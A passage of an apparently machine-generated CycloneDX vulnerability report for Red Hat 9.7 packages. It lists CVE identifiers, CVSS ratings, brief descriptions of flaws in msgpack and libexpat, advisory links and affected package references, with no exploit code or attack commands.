          "versions": [
            {
              "version": "3.0.7-8.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-32284",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "The msgpack decoder fails to properly validate the input buffer length when processing truncated fixext data (format codes 0xd4-0xd8). This can lead to an out-of-bounds read and a runtime panic, allowing a denial of service attack.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32284"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32284"
        },
        {
          "url": "https://github.com/golang/vulndb/issues/4513"
        },
        {
          "url": "https://github.com/shamaton/msgpack"
        },
        {
          "url": "https://github.com/shamaton/msgpack/issues/59"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32284"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4513"
        },
        {
          "url": "https://securityinfinity.com/research/shamaton-msgpack-oob-panic-fixext-dos-2026"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32284"
        }
      ],
      "published": "2026-03-26T20:16:12+00:00",
      "updated": "2026-03-30T15:16:27+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-32776",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32776"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32776"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1158"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32776"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32776"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-03-17T15:52:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.5.0-5.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-32777",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        835
      ],
      "description": "libexpat before 2.7.5 allows an infinite loop while parsing DTD content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32777"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32777"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1161"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1162"
        },
        {
          "url": "https://issues.oss-fuzz.com/issues/486993411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32777"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32777"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-03-17T15:52:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.5.0-5.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-32778",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier out-of-memory condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32778"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32778"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1163"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32778"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32778"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-03-17T15:52:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.5.0-5.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
